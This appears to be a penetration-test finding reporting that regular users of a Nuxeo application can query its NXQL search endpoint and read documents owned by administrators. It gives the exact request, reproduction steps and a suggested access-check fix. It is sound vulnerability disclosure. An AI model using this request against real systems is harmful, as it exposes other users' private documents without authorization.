Critical Severity : medium
Criticality Justification
A regular user can execute NXQL searches without restrictions thus accessing to documents that do not belong to him
Steps To Reproduce
Step 1: Login with a regular user to the application (user-pentest-1 or user-pentest-2)
Step 2: Execute a GET request to the endpoint /nuxeo/api/v1/search/pp/nxql_search/execute with the user's session including the following parameters currentPageIndex=0&pageSize=20&queryParams=SELECT%20*%20FROM%20Document (https://api.us.cobalt.io/v1/attachments/att_Wr01QgY/preview)
The user will be able to access document details from other users such as nco-admin or pentest-admin which are not available in regular queries in the endpoint /nuxeo/api/v1/search/execute which is the one regular users use.
Suggested Fix
Perform an access check before returning or processing the information in the /nuxeo/api/v1/search/pp/nxql_search/execute endpoint, which should be available to Admins only. In case that the user does not have access to that resource, simply reject the request.
Prerequisites
Authenticated user required